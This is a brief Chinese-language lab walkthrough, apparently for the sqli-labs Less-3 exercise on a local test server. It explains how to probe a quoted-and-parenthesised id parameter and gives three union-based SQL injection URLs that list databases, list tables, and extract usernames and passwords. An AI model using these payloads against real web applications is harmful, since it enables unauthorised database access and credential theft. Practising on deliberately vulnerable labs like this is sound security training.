正常进入页面发现,观察url进行盲注测试 一般是 ' " ) 根据进行测试 判断是数字还是字符 测试发现不存在4 那么只有3 进行常规得测试 得到数据库http://127.0.0.1/sqli/Less-3/?id=-1%27)%20union%20select%201,group_concat(schema_name%20),3%20from%20information_schema.schemata--+ 然后进行拿表http://127.0.0.1/sqli/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x75736572--+ 通过列注入拿到密码http://127.0.0.1/sqli/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(concat_ws(%22~%22,username,password))%20from%20security.users--+